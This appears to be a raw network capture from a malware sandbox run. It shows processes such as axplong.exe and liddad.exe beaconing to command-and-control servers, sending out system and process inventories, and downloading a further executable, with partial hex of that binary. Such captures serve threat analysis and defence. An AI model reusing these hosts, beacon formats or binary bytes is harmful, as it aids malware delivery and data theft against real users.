                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:31.151083946 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:31 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=85
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449971185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:27.904076099 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 34 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010458001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:28.607445002 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.44999334.147.147.173806452C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.329643011 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 496132
                                                                                                                                                                                                                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 37 32 32 38 33 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317722836", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334525108 CET4944OUTData Raw: 44 65 6a 52 50 68 78 34 76 38 52 36 61 42 71 65 68 58 32 6d 61 76 61 65 52 71 2b 6b 57 46 79 7a 57 4e 5c 2f 62 50 4d 6b 4c 57 30 7a 53 57 73 38 38 4d 6e 39 4b 33 5c 2f 44 71 7a 39 67 6f 39 66 67 4d 70 5c 2f 77 43 36 6d 5c 2f 47 50 5c 2f 77 43 65
                                                                                                                                                                                                                                                  Data Ascii: DejRPhx4v8R6aBqehX2mavaeRq+kWFyzWN\/bPMkLW0zSWs88Mn9K3\/Dqz9go9fgMp\/wC6m\/GP\/wCeFX8s+LX0psg8JuMK3B+P4VzjN8TQwGBx88Zg8ZgsPQccdCVSFOMKylUbhGK5pPlTk7JWXM\/7K8EfodcTeNPA1HjnLOMciyTCYjM8wy2GBx2BzDE4lSy6pCnUqyqYdxpKNSU3yRV2lFNu8rR\/jXor+yf\/AIdV\/
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334585905 CET2472OUTData Raw: 45 74 53 4b 6c 64 38 6a 74 4c 64 58 6c 39 34 61 6a 67 68 48 48 6e 33 58 69 57 30 6c 6c 78 75 46 70 47 54 73 48 4b 76 70 58 68 4c 53 41 47 38 51 2b 4d 49 4c 6d 34 41 51 74 70 48 67 32 7a 50 69 4b 37 69 6b 7a 75 61 43 38 31 69 35 6e 30 6e 77 7a 46
                                                                                                                                                                                                                                                  Data Ascii: EtSKld8jtLdXl94ajghHHn3XiW0llxuFpGTsHKvpXhLSAG8Q+MILm4AQtpHg2zPiK7ikzuaC81i5n0nwzFGyYVb3RdW8S+VI\/zWb7GU9z8NPiZp\/wAXvgpp\/j7Tbee0j1rQrkXltNBPCltq9lG1lrVpaSTqpvLOy1aC8s4L2PdHcC3LAhg6r841+RZjnPEmVVK2U4qqsNjMFWrYXEueGo\/W6OIw1R0atKT5XhrRnGS0w3Pz
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334604025 CET2472OUTData Raw: 6f 6f 70 62 74 72 69 37 61 65 35 6d 5c 2f 70 5a 38 61 66 45 54 77 66 38 57 74 59 5c 2f 59 42 2b 4a 50 77 5c 2f 31 71 31 38 52 65 44 50 47 6e 78 2b 31 33 78 42 34 65 31 69 30 33 43 4f 37 73 4c 37 39 6a 54 39 72 4a 30 45 6b 55 67 57 61 30 76 4c 61
                                                                                                                                                                                                                                                  Data Ascii: oopbtri7ae5m\/pZ8afETwf8WtY\/YB+JPw\/1q18ReDPGnx+13xB4e1i03CO7sL79jT9rJ0EkUgWa0vLaTzLTULC5SK80+\/gubG8hhureaJP53f8AgrBlv25Pirjnbo3wyX6f8Wz8Jt\/7NX7F9FrC08D42cOeyyuOR4jG8EcUf2pltKeZKNPGYPO81y6pTq0szxmMxdKcFlmGVahVrONPEUnJU6ctF\/Ov00sVPHfR74n9rm
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334630013 CET4944OUTData Raw: 70 5c 2f 77 44 58 71 4f 67 32 4b 39 4d 66 70 2b 50 39 44 54 32 58 73 52 5c 2f 6e 31 46 52 79 64 76 78 5c 2f 70 51 64 42 48 55 66 6c 2b 5c 2f 36 66 5c 2f 58 71 53 69 67 31 68 74 38 5c 2f 30 52 56 5a 64 33 34 56 44 5c 2f 77 43 67 66 35 5c 2f 44 70
                                                                                                                                                                                                                                                  Data Ascii: p\/wDXqOg2K9Mfp+P9DT2XsR\/n1FRydvx\/pQdBHUfl+\/6f\/XqSig1ht8\/0RVZd34VD\/wCgf5\/Dp\/nFXPL9\/wBP\/r1WaP2+T+QH+eMZ96Dp9\/8Au\/iQyLj7\/wDy09e2P8\/ln0qIb\/48+2f849OlWJf4vw\/pUfl+\/wCn\/wBeg2p9fl+pHUDd9n+f8+\/f2qyy7fcVDJ2\/H+lB2FD5\/n4+\/wBenQf59ua
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334666967 CET4944OUTData Raw: 4f 4d 65 4e 50 43 72 77 70 78 58 68 72 6e 47 58 34 58 4f 38 6d 7a 66 4a 75 4b 63 76 78 4d 38 79 6e 68 61 57 59 34 4f 50 43 57 59 5a 66 4f 6e 6c 32 4e 77 31 4c 45 30 5a 56 38 54 51 7a 6a 6d 6f 56 61 6b 71 57 47 64 43 56 53 53 78 4d 45 34 4f 58 72
                                                                                                                                                                                                                                                  Data Ascii: OMeNPCrwpxXhrnGX4XO8mzfJuKcvxM8ynhaWY4OPCWYZfOnl2Nw1LE0ZV8TQzjmoVakqWGdCVSSxME4OXr958V\/D\/hn9hHTPivbRXWvaPd\/CPwBqPhrT7Gxubm\/wDFV\/4x07wvp\/grQdP09Yjcyah4s1rXNF0Wxt5I0xd6nCty0MYkkTK+NPg28+H3\/BOr4h+CtTm+06t4V\/ZmtPDWrXAl89Z9S8N\/DTRfD13NHKAP
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334713936 CET2472OUTData Raw: 49 66 4c 38 78 58 38 6c 50 6e 7a 35 6f 5c 2f 64 66 58 6b 66 35 5c 2f 44 4e 45 63 66 33 50 6e 6a 48 6d 66 38 41 4c 50 79 76 5c 2f 4a 58 72 5c 2f 6e 38 61 4a 49 59 57 57 4e 39 6d 65 76 38 41 6e 5c 2f 50 36 39 7a 79 35 46 6a 54 65 6b 6b 79 66 36 33
                                                                                                                                                                                                                                                  Data Ascii: IfL8xX8lPnz5o\/dfXkf5\/DNEcf3PnjHmf8ALPyv\/JXr\/n8aJIYWWN9mev8An\/P69zy5FjTekkyf633z69fT\/J75+z8\/w\/4JfO\/L+vmQyM7F3d9g\/wBX\/qrbP+f0\/qzbu3u6eS8n+fp3xz\/SnpGNr\/uY9mP4\/pxa\/wDX93pkmfMf\/wBp\/uIPT6+\/WszUZHs8w787\/wDVS\/8AyV+H9KYJC3zo+X\/55\
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.334726095 CET2472OUTData Raw: 46 4f 34 69 73 5a 43 32 4e 50 6a 6d 61 43 30 43 48 6f 6b 6b 4d 41 68 67 6d 32 6a 67 53 53 51 37 2b 75 57 4a 5a 74 33 6b 32 67 61 6c 70 50 69 6e 78 6c 38 50 5c 2f 41 65 69 65 49 66 43 37 65 49 66 69 58 38 51 66 42 66 77 30 38 4e 43 5c 2f 31 79 4b
                                                                                                                                                                                                                                                  Data Ascii: FO4isZC2NPjmaC0CHokkMAhgm2jgSSQ7+uWJZt3k2galpPinxl8P\/AeieIfC7eIfiX8QfBfw08NC\/1yKDTx4j8d6\/Y+G9EbUZtPg1W+hsF1HUIGvJbPTL+6jtxI9vZ3MoSB+V0H4geGdeiu2g1jRlls9Y1TQ5Y01W3dZb3SLprS6Nr562txLCZUJiZ7WGQoVLxRsSg\/EcL4N\/R2wfF3JQ4P4T\/1krYOWaRyutPE4rAfU6
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.339411020 CET4944OUTData Raw: 59 79 6b 35 64 66 46 66 47 5c 2f 30 79 2b 4c 63 4a 53 78 32 62 56 75 4d 4d 70 6f 59 48 49 4d 31 79 66 4d 73 44 6c 31 53 6a 77 76 44 4e 63 73 77 65 49 7a 6c 5a 7a 6d 65 63 38 4a 30 63 58 67 36 47 49 6c 54 6c 54 7a 58 4c 63 5a 6d 39 48 4a 4d 50 68
                                                                                                                                                                                                                                                  Data Ascii: Yyk5dfFfG\/0y+LcJSx2bVuMMpoYHIM1yfMsDl1SjwvDNcsweIzlZzmec8J0cXg6GIlTlTzXLcZm9HJMPhrZdUwLqe3wVWMeoRBGoVd2B\/eZnP4sxJP506q\/iR7vwfq\/wAYtF8SSaRpV78E\/iD4a+F3iEzavJJbeJ\/GvjK51CfwnpPw+uINPlXxKuv+DdF1z4l6dqE40nTJPAOlNqzXq3mqaBpmrWK\/ozIOKOHuKMPWxP
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.339514971 CET2472OUTData Raw: 64 45 2b 68 5c 2f 6e 55 56 55 64 33 76 5c 2f 77 42 33 38 53 47 58 76 5c 2f 75 5c 2f 34 30 7a 68 68 37 47 70 6e 36 66 6a 5c 2f 51 31 46 51 55 56 5c 2f 4c 32 65 2b 65 5c 2f 38 41 54 74 55 63 6e 62 38 66 36 56 61 66 37 70 5c 2f 44 2b 59 71 47 73 5c
                                                                                                                                                                                                                                                  Data Ascii: dE+h\/nUVUd3v\/wB38SGXv\/u\/40zhh7Gpn6fj\/Q1FQUV\/L2e+e\/8ATtUcnb8f6Vaf7p\/D+YqGs\/Z+f4f8E6CvUcnb8f6VO3Rfp\/QUyszoI5O34\/0qOrFRs3Yfif8ACg29\/wDu\/iU6hf7x\/D+Qq6wLfnmo9h9v8\/hQb06n62dt\/wCv686lRy\/fP+e5qzj7\/fP8+v8AWq3\/AC0\/z\/drb3\/7v4ljJPu\/
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.339545965 CET4944OUTData Raw: 33 5c 2f 41 46 30 50 6d 5c 2f 38 41 50 4c 5c 2f 55 48 72 5c 2f 6e 36 39 36 75 65 5a 4d 30 6a 70 6e 41 6b 6b 5c 2f 31 63 66 38 41 79 78 2b 6e 2b 65 66 71 4b 5a 49 79 66 50 38 41 4a 5c 2f 30 79 6c 5c 2f 77 2b 76 76 79 61 6e 32 66 6e 2b 48 5c 2f 42
                                                                                                                                                                                                                                                  Data Ascii: 3\/AF0Pm\/8APL\/UHr\/n696ueZM0jpnAkk\/1cf8Ayx+n+efqKZIyfP8AJ\/0yl\/w+vvyan2fn+H\/BOgrSRuu1\/wB48fTn8PT8T796ZtfbD8hR\/wDVSyf+2v8AL\/PFWir+Ym\/zP9d\/yzl\/cf8A1qj2vv3v8h87yv3n\/LX+X06\/zo9n5\/h\/wQGeX+7hRnLp\/pHm\/lR8gVHmfy\/+evb\/AEf\/AD+P5USb5F
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:33.698424101 CET138INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:50:33 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 1
                                                                                                                                                                                                                                                  Data Raw: 30
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.45002134.147.147.173806452C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:34.448728085 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:35.097323895 CET353INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:50:34 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 207
                                                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.45003234.147.147.173806452C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:35.889863014 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                                                                                                                                                                                                                  Host: home.fortth14vs.top
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                                                                                                                                                                                                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:36.604190111 CET353INHTTP/1.1 404 NOT FOUND
                                                                                                                                                                                                                                                  server: nginx/1.22.1
                                                                                                                                                                                                                                                  date: Fri, 03 Jan 2025 08:50:36 GMT
                                                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                  content-length: 207
                                                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.450061185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:41.685523033 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 36 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010681001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.393217087 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.397341967 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620066881 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:41 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 5164032
                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Jan 2025 08:35:40 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6777a15c-4ecc00"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 e0 4e 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 4f 00 00 04 00 00 62 98 4f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg(N@ObO@M$a$$ $$@.rsrc$$@.idata $$@fhrhjlue*$*$@cszsfekvNN@.taggant0N"N@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620090961 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620110989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620156050 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620168924 CET896INData Raw: bf b8 19 9e 50 61 eb 9d 65 61 ff a7 f3 e5 88 17 bf 61 f7 ef f0 ec f6 0c 30 50 0a a8 03 e5 90 29 f0 83 1d 2e 2b bd a8 20 36 72 32 9e 7e 61 07 49 07 43 0a 21 36 72 1e 49 7f 42 0a 21 38 72 32 9e 7e 61 0e 9e 50 61 12 eb ee ec f6 0c 30 50 0a a8 80 d5
                                                                                                                                                                                                                                                  Data Ascii: Paeaa0P).+ 6r2~aIC!6rIB!8r2~aPa0Pt+-`V `V H.C!TI}. 6rZ9M;52-HC$D(}. 61OA-=arL5rBE52-ItC(}. @!-MIk-!6
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620294094 CET1236INData Raw: b2 fd c7 20 bf 62 14 a6 01 2e 93 d6 52 d5 b0 2e bf 2d 93 de 5a b2 49 cd ba 55 f6 70 fc 2d ba 53 b3 21 7b c0 be 20 41 aa eb d5 e1 35 b3 fd c7 20 d3 3a c9 a0 05 41 3a df be 2d 97 4a 37 8a 32 a6 fd 2e 32 0b ad 2d 0a a8 4e b6 96 98 43 e3 95 24 d7 41
                                                                                                                                                                                                                                                  Data Ascii: b.R.-ZIUp-S!{ A5 :A:-J72.2-NC$A:. 6rV-.!<-y"-VA5L;sA2G-FDa--6r.0P~SyDL5Zh/-p2-ZIS!{DI??!6rJ.
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620305061 CET1236INData Raw: bf 20 14 a1 8b 41 3a df be 2d 96 26 01 ad 5b 2d 6f 6f 0a 21 d4 e3 8e db bf d5 90 26 bf 2d 91 59 37 6a 46 9e 49 61 0e c9 b2 fd c7 20 f2 ec f6 0c 30 50 0a 20 d4 e1 8e db bf d5 b0 25 bf 2d 89 d6 8e 2d 91 79 b9 b1 32 22 bf 2d 93 b6 d2 ec 1c 54 43 08
                                                                                                                                                                                                                                                  Data Ascii: A:-&[-oo!&-Y7jFIa 0P %--y2"-TC26rF~aT=IB-IB~-pT<tI:!6TC8D,. .+ 6D,%-Y7SITJKF-/. 6r.PJ JBn-
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620317936 CET1236INData Raw: 43 e3 95 38 44 08 96 2c ee 83 1d 2e 93 be a8 20 d7 89 ff df be 83 1d 2e 2b bd a8 20 3e 6a 3e 21 d3 35 91 de 6a d5 80 2a bf 2d 8f dc bf d5 68 29 bf 2d 93 de 6a b2 49 cd b8 b2 13 cd b4 83 91 69 ef ec f6 0c 30 50 0a a8 80 d5 94 29 bf 2d 91 60 56 5d
                                                                                                                                                                                                                                                  Data Ascii: C8D,. .+ >j>!5j*-h)-jIi0P)-`V]!VU!JI6!>j "-VT9P4(-Q5r>Pa~a0PCTI}SytCW9!!WA!tC$D(}. 61G-J JBn-!W!!
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:42.620328903 CET1236INData Raw: ba b8 1d aa 01 35 ca 48 53 30 0a 21 38 34 87 61 d2 3c 91 e3 56 b2 52 cd b6 7e ba 53 b3 21 7b c0 be b8 cb 4c 35 33 bb 9f 5a 39 91 55 37 74 12 e1 56 f9 08 21 bf b6 04 9e 7e 61 0d a8 f8 e5 86 6a d2 35 bb f0 49 42 d6 b1 dd 2d 32 2f 50 ec 1c e0 3f f1
                                                                                                                                                                                                                                                  Data Ascii: 5HS0!84a<VR~S!{L53Z9U7tV!~aj5IB-2/P?U!-[(-$=TI--5eV-TITHIB-!@!-abFIQ-!-jaz(;9z]5(D'8nH\/P9jaobo\/P1(8^
